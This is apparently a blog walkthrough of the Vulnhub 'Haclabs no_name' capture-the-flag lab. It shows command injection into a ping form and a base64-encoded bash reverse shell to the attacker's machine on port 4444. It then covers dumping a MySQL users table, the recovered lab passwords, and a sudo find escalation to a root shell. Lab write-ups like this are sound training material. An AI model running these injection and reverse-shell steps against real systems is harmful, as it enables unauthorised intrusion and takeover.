Vulnhub – Haclabs no_name Walkthrough

We start scanning the host with namp –A –T4 –p- –vv

Only port 80 is open, running dirb once got a page index.php with a ping box and it’s saying it’s a fake ping and then running dirb again with extension .php got a result:

The page superadmin.php with a ping box, running a ping with|id

We got the id of the host so now we can get a shell back to our machine using nc, after trying nc didn’t work so im going to use another shell and convert it to base64 code:

bash -i >& /dev/tcp/ 4444 0>&1

Now we convert the command into base64 site code and post it with echo into the ping box: | echo”<BASE64 CODE>” | base64 -d|bash

We open a listening port on our machine to get a reverse shell:

Then navigate to the home directory, the first user is yash and his flag:

The second user is haclabs and his flag is:

Running script we can see we can login to Mysql database as root without a password:

Mysql –u root

Show databases;

Use hacklabs;

Show tables;

Select * from users;

And now we got the username yash and his password as base64, we decode it and we got the password destruction089

And we login using his credentials su yash and then his password:

Ok the flag1 said the password is saved in a secret place, we can find it with this command:

find / -type f -name “.*”

And yes it’s there, navigate to the location and view it:

We login, su haclabs and the password haclabs1234 we can find that the user haclabs can use sudo command:

Using the command sudo find . -exec /bin/sh \; -quit

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s